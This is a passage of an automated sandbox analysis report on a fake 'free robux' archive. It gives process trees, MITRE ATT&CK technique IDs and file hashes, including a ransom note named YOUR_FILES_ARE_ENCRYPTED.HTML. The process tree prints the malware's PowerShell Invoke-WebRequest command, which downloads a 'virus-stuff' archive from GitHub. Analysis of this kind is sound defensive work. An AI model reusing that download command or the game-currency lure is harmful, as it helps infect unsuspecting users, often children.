  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8932 /prefetch:1
  2⤵
  PID:6032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8936 /prefetch:1
  2⤵
  PID:4340
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8552 /prefetch:1
  2⤵
  PID:4372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6456 /prefetch:1
  2⤵
  PID:5172
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8052 /prefetch:1
  2⤵
  PID:3096
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7220 /prefetch:1
  2⤵
  PID:3388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9552 /prefetch:1
  2⤵
  PID:3724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9468 /prefetch:1
  2⤵
  PID:7904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8096 /prefetch:1
  2⤵
  PID:8048
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=90 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9720 /prefetch:1
  2⤵
  PID:8060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:1
  2⤵
  PID:7196
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9708 /prefetch:1
  2⤵
  PID:5968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8692 /prefetch:1
  2⤵
  PID:6836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8624 /prefetch:1
  2⤵
  PID:7532

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4876

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5936

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
PID:3104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcaceb3cb8,0x7ffcaceb3cc8,0x7ffcaceb3cd8
  2⤵
  PID:1524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1852,17225047646322369961,11697127529763249972,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1816 /prefetch:2
  2⤵
  PID:760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1852,17225047646322369961,11697127529763249972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1992 /prefetch:3
  2⤵
  PID:6240

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3020

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:676

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6284

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3916

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:2424

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4720

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:936

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3336

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6604

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4692

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5548

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4812

C:\Users\Admin\AppData\Local\Temp\Temp1_free-bobux-main.zip\free-bobux-main\robux.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_free-bobux-main.zip\free-bobux-main\robux.exe"
1⤵
PID:5164
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:1688
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\14F.tmp\150.tmp\151.bat C:\Users\Admin\AppData\Local\Temp\Temp1_free-bobux-main.zip\free-bobux-main\robux.exe"
  2⤵
  PID:6212
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
    3⤵
    - Blocklisted process makes network request
    - Drops file in System32 directory
    PID:4980
- - C:\Windows\system32\timeout.exe
    timeout /t 3 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:7164
- - C:\Windows\system32\timeout.exe
    timeout /t 10 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:6876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Temp1_free-bobux-main.zip\free-bobux-main\free bobux.bat" "
1⤵
PID:6020
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
  2⤵
  - Blocklisted process makes network request
  - Drops file in System32 directory
  PID:1628
- C:\Windows\system32\timeout.exe
  timeout /t 10 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:2424

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
1⤵
PID:6904

C:\Windows\system32\printfilterpipelinesvc.exe
C:\Windows\system32\printfilterpipelinesvc.exe -Embedding
1⤵
- Drops file in System32 directory
PID:5156

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1960

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4664

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4280

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2808

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7008

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4404

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7176

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7000

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5088

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7636

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa38d8055 /state1:0x41c64e6d
1⤵
PID:6280

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Java\jdk-1.8\jre\lib\YOUR_FILES_ARE_ENCRYPTED.HTML

Filesize
4KB

MD5
57f217232cbbd4f74ae738d36265a496

SHA1
c266a7d1660caf6d2ac971af9a2fc144de14be37

SHA256
a62acf5bd967ef20bdc9773f353cba5803ef78848c50c84e22619cbf3e3c4c48

SHA512
e8012b7eb5b0ded86c260e2509cab0c652cab0cbb6e6c473cef8de2fcbdc44118ae1e21f149c14502893ae64eff4ca5fee6a3f145cd91b7cbec30f993fc62fce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ae7fbf62fc07f0bdb15169d2de3dc768

SHA1
9155eb973df31a7d6fb95f03058dd523171b4f0f

SHA256
ecfebc84b01ed9071cc68bc2abc4eae4f891e1dea41a16ea6010f7acfd6cc624

SHA512
1539bd6c522e56685399616d9811435ff0197c9471404361c53370a261feb180a38aaec9aacd38ff52c94b2cac2e4da19a3de50a9b6541f6f3fd0497bf15bcae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
a5e869975d65ad786022d6fc8b47b747

SHA1
14b030f53bc86bdbec766b2f3942804ca742043a

SHA256
d5f8f63c67fd06a2ae7da80cbe8cc96bab5932087eb70432df9147ba818d758f

SHA512
fd8d2b8ce13f4aca312f4856096edba99310a78a5f4c4148046a06e873a3d2514fd2dd9b4515fc89e83306d251929f2ef9c78863f85a3e017a3029dec63d98dc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
59de9492a1c0cbfc1c78eefc6d494b0b

SHA1
260f3609cc5e909e746776bc8b77cd63ddd73c93

SHA256
1ff651fb1ccf024bdbde749fc9c6b9e9b5686fd5d870e15e84606cdd45fc6ab3

SHA512
d8c43e135c686155984f92371b7fc2f2798364639eac5d312a02be8dc3b9fa80287007a2b025d8d0b3d48fffd52509d5ca0e8eedb88968f6fc7e85e6faba6ece

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
783f112564f4c7a4795ae16ff2248565

SHA1
e6af6567c5f48b305354ec88e767f22ce4e24802

SHA256
20438eaa87f27ea09d98b7f33002f608c834a696e030c32879032a2420e68fd0

SHA512
461572c531afada4eec7d33537c75b063cf306b191b783595486cc8865678a0eda861e96a0cbfcb3f457597ac5ead6d019e2ddcb9ba61e905533373a2bace57f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000e

Filesize
64KB

MD5
d6b36c7d4b06f140f860ddc91a4c659c

SHA1
ccf16571637b8d3e4c9423688c5bd06167bfb9e9

SHA256
34013d7f3f0186a612bef84f2984e2767b32c9e1940df54b01d5bd6789f59e92

SHA512
2a9dd9352298ec7d1b439033b57ee9a390c373eeb8502f7f36d6826e6dd3e447b8ffd4be4f275d51481ef9a6ac2c2d97ef98f3f9d36a5a971275bf6cee48e487

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000f

Filesize
69KB

MD5
aac57f6f587f163486628b8860aa3637

SHA1
b1b51e14672caae2361f0e2c54b72d1107cfce54

SHA256
0cda72f2d9b6f196897f58d5de1fe1b43424ce55701eac625e591a0fd4ce7486

SHA512
0622796aab85764434e30cbe78b4e80e129443744dd13bc376f7a124ed04863c86bb1dcd5222bb1814f6599accbd45c9ee2b983da6c461b68670ae59141a6c1a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000010

Filesize
36KB

MD5
08e0c4f217e8b004e9602548d8165aac

SHA1
cb01023750b0f888b785b6a085f259bf6f9fef81

SHA256
9131f1d168427f36c0425c4caff0ae337f16ab85e368db254a59f62acc7c489f

SHA512
b800ba2ddcb46a0c8c0fdd804afa69d3ce96b39a63f7da047d56940ef535b34749e9509a314d4af9a39c8b215aa7166e13cbef6dcee806395393dfdb2393e1e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000011

Filesize
19KB

MD5
2e86a72f4e82614cd4842950d2e0a716

SHA1
d7b4ee0c9af735d098bff474632fc2c0113e0b9c

SHA256
c1334e604dbbffdf38e9e2f359938569afe25f7150d1c39c293469c1ee4f7b6f

SHA512
7a5fd3e3e89c5f8afca33b2d02e5440934e5186b9fa6367436e8d20ad42b211579225e73e3a685e5e763fa3f907fc4632b9425e8bd6d6f07c5c986b6556d47b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000012

Filesize
65KB

MD5
56d57bc655526551f217536f19195495

SHA1
28b430886d1220855a805d78dc5d6414aeee6995

SHA256
f12de7e272171cda36389813df4ba68eb2b8b23c58e515391614284e7b03c4d4

SHA512
7814c60dc377e400bbbcc2000e48b617e577a21045a0f5c79af163faa0087c6203d9f667e531bbb049c9bd8fb296678e6a5cdcad149498d7f22ffa11236b51cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000013

Filesize
84KB

MD5
74e33b4b54f4d1f3da06ab47c5936a13

SHA1
6e5976d593b6ee3dca3c4dbbb90071b76e1cd85c

SHA256
535fc48679c38decd459ad656bdd6914e539754265244d0cc7b1da6bddf3e287

SHA512
79218e8ee50484af968480ff9b211815c97c3f3035414e685aa5d15d9b4152682d87b66202339f212bf3b463a074bf7a4431107b50303f28e2eb4b17843991c2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000014

Filesize
1.1MB

MD5
1f557ae943b3a1e823b56cf9d410e7c3

SHA1
1340fc7fa2cf9fade7bebcc8b4dc62a1686aad54

SHA256
40f47bca0281df7ada22465ba6c706a9ccf9580288915aad5d42c2949521a7bb

SHA512
32d8f83a30ed7179a74ebc7bdcd454d2f5895592f078910564c8bf40490d92c24a836f50b359345cdf4f0288f9a922b0185beeccbc4007205ba50f585de20169

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000015

Filesize
33KB

MD5
3cd0f2f60ab620c7be0c2c3dbf2cda97

SHA1
47fad82bfa9a32d578c0c84aed2840c55bd27bfb

SHA256
29a3b99e23b07099e1d2a3c0b4cff458a2eba2519f4654c26cf22d03f149e36b

SHA512
ef6e3bbd7e03be8e514936bcb0b5a59b4cf4e677ad24d6d2dfca8c1ec95f134ae37f2042d8bf9a0e343b68bff98a0fd748503f35d5e9d42cdaa1dc283dec89fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000016

Filesize
75KB

MD5
cf989be758e8dab43e0a5bc0798c71e0

SHA1
97537516ffd3621ffdd0219ede2a0771a9d1e01d

SHA256
beeca69af7bea038faf8f688bf2f10fda22dee6d9d9429306d379a7a4be0c615

SHA512
f8a88edb6bcd029ad02cba25cae57fdf9bbc7fa17c26e7d03f09040eb0559bc27bd4db11025706190ae548363a1d3b3f95519b9740e562bb9531c4d51e3ca2b7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000018

Filesize
39KB

MD5
8088025140205b4809f5b24be56be952

SHA1
df3d022d9e605ec109e924a9fc478267e259b398

SHA256
3369056e51d9a54a7ae7cb1a3b0b19592aec0dfbc40e937e967edf7ecfa366ee

SHA512
0102b276cdc1fb034828cf507a6dbc1690119900e13c713a25a295100c95509b8da87f1730a81d6b7b9557bb687e1502244fd1f35eebd4859f7bb7bf23c03957

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000074

Filesize
99KB

MD5
963256b0db15bca2ebb623155b80f338

SHA1
50f9624145835d26e5008c1dd6f4c27ef198127e

SHA256
deb178d91a6616e8a1b94bfa3da075bb3d720aeb95fddd1fa44f965abcced78c

SHA512
641b991b8883f2848b347453bada72fe7cb46025271c513b9de6de6bb03bcf9165cb688c5fe9e3547685af1520b7d4c6715c021a8ba80b7ed361dbbe5918cd92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00007c

Filesize
132KB

MD5
ed91d07cd5e43f34266788b4c3c5db58

SHA1
6bee3d7cca8cd0f677ce3635d5125069d97a341d

SHA256
d714741ff614024875ba7369e72038d6322940c4d1e5c08596324699cb08c048

SHA512
c490781ccab977e8045aaf063c3ff7ac53c41bf3498d4dc8b38c098e67720eb772b5cc57a0f887ac4d8afbe548b19e0d8f202648ec90ace0398d92cf6a7fe0ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00007d

Filesize
243KB

MD5
0d2dc4c04a97fd331759d4b4f4d7e4cc

SHA1
1745cae06747f7777f809fa3220cca4a8210dd84

SHA256
b641d2012271bb75f7e82c5020f99d2ada0684651fc1787c70912b877b707bae

SHA512
e86eecbdba2de835514cb6a4ccde7b830818f4dd0c3e9aed17c6d35961bee2f53c2b488c32dde29a3aced6d032bdbae8106058ec88d7959076ade2f5ce1023e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00007e

Filesize
16KB

MD5
49295de6ccd23cf80b6418a2d209868f

SHA1
42a955b4560bb22cb9b5b39577f7a691ea345018

SHA256
d5a29c73c6200af2ed6918a61106e649b92098ecd476830d725ed4d2ea5a8efa

SHA512
2954ab185fd84a08933bb6e79d91e301021fce4e632b477e765c172cacf72913561e101ed2f7e66bfbdc5946b35f2b63eb2b6f878e0afc9d26ffe71ee112a1c0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00008b

Filesize
46KB

MD5
fc61620b49e35cb359b1f0cf208f6a87

SHA1
54d6ad78961f356ae02cf52144e2baed96f97485

SHA256
65cf192b867dddedcb10ee782d29d0989c00395fc6ff6a0923e23756ab8e0eba

SHA512
17ae00dcb2a9293e33007c623ebb462ba4961e345255733b03b1dcd4bbecf34db280e77b57813e5b5c42467ec0a7c7af1b40fb038650fe526be380f4624dea17

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00008c

Filesize
217KB

MD5
1f2aa7604e57ad717d7d816b524b00cd

SHA1
1abd121a3eb2864250d2dc968df678728a684fb2

SHA256
6b8bdf6c6c1778cad5f58f61e2d007651d7a1f9ab47f7d9f96739fdf7bd3b39e

SHA512
b728e70afd695f82a20da9352b2793fc0d9e2a6b4f118da1489352efea5bb9058b9e732297a64bf29728c946bb8abe9d66a82c761b7e999ac67d091647c7f60f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00008d

Filesize
22KB

MD5
7a204d478c8dfe822bf86f9103bbd9b3

SHA1
7114b36ea1588d9372d730b2ee5dec7a3aee36d1

SHA256
d9134e3cf60db564c49cc181251c7308bc568acf060444c443a90c0f464ebfeb

SHA512
f5fb06a9808e9370a5fb3b926ffa27746ca7942eba36a2f63135168218e326abc74195453b9bcd8a045d5870a71b7f250dfc281515c7fa51857410acb316763e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00008e

Filesize
17KB

MD5
074e969bb4b56acd26091b19784df7e2

SHA1
0b8f66fd70f29859ea25ee481ff33f93bb84d512

SHA256
405893b0bf0b3e87141e7048e1cb6665ca5593fea1b159ca0ce90e77d049c51a

SHA512
0e7286126446b64efb16d8891ae2a649e4ccce337510eba812294e78b78d3d2680f4504bfcac7a8347e809c2e3fd905215ed711f60894b25a5beeff252372c8f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000090

Filesize
791KB

MD5
2e61735953b5ee5f2a472617238081d4

SHA1
506cb785f0f5644d95bd1feec668bf798b27adcd

SHA256
f06fe8e6a27d97192bc24294c4f51bf30670700647215c44d170fa7507935c3d

SHA512
7f1a4f877380885935e97a5868d112855ccaf0fe0e2a9fd3c2eb0ba771a01aad4659d059a6b97f6b497adf184e0e7dda6d20cbc15aa140da820bc8b596172973

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000091

Filesize
32KB

MD5
a8bf5c4878a07b492bdb5a55ffb5be48

SHA1
b527eb4b3712ca9a056e844454c90c81321d9c65

SHA256
20616050bedc4534e23087d6e1eb6688c97d9a72952d17fee991989ba821ed4f

SHA512
cfd5023ecc20f17675f23d74f242e9370e8bb06c00f593226a1caa97a870357f943bbbc23baa037023fc0d82e5947ff12d08c1923b97d4caf246daa464223a11

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000092

Filesize
23KB

MD5
b8b24d0cef13bc55bfe1234451c4addf

SHA1
9cff8d7ba2425b0257eb4a2b1f103b9b5ee2e2f9

SHA256
0b37fff7e12816c8e01f7c0c37a05dd1233118ffece533359040a20cc6633331

SHA512
d23c1b6e6cc48f24ead48babd45720fb002686f925a848510c844b4358bc58a2f481b94f485ee5448739075395122eef97d8f158d9a14a4aac919be569474b3c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000093

Filesize
18KB

MD5
68f5880b57cefd421b12ba2ae40942c5

SHA1
5e3615c7f7fad4059c926019caab9aa433de512a

SHA256
e07530e799901403705cdcb20c5c92cbb8e19d51e1329f5d6a12d87860930967

SHA512
21e85830884b0547dc24caaf88a242dd9368739b47f0d9ae2fa1434c6f4e39ebdb06c1d5d4a61e40aa2694e271edbcf9da57b9cb1fa56d3b640301ecfd7b9f19

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000094

Filesize
33KB

MD5
1c32728df0c2488668616bbca7885544

SHA1
8b04abebcbd5b38621d536fbdc5c489b17744341

SHA256
8b5080a2f287174c9b8cbe5e9e080af09d52aac643af41a0dcdec041f8d8832c

SHA512
7d8503a045485caa247c832e4b253aa3091271efa59e905345f4f0084b6987f2cc0ea4ff22e0bf9d88c098713838488670f4f617de85d71c517f7bc440c2786d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000099

Filesize
1.5MB

MD5
12cf23b82d90a09bafa131fe5f48f281

SHA1
37e35f79c869ae0a80dc89d834251bec15563f86

SHA256
a4e75fdc78f55811df23b2d6533f388c07e29d75d686ac91e058ddc4a0156c9c

SHA512
0792715a69a56852d71b7740d48897a9384ea3a398f1eb3e78635e49e625e33dcae4ea9629cb5c635b005ee403e1b1fe47c80e6ff058ea5754d54bb41fe83fa4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00009a

Filesize
19KB

MD5
b4eb59ce89f70dbfc07199c081907c5b

SHA1
cfe730182f60bb20d24362d629e7313d5c9b622d

SHA256
09217a1f82361f5ba36162970dee6c35286537dc53d27a34d557277fa9f781c9

SHA512
046cbc85ee48eaa7d68682322e215252f069922904fcaa194c3a958b84fb50131f210c672a47e27e1f72d6a1971f3f16fcdfa186da2ffc8167282a466ca85501

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00009b

Filesize
19KB

MD5
8f5a32262cfc3a9657476071f31fe4e7

SHA1
bbe0a6f1e56150337185bd74e7722916ef84768a

SHA256
91c35d9ed69f2aadcf5a86c6cbde63d1ee65b9e2a28e1c5afbf52ea0cb483f4d

SHA512
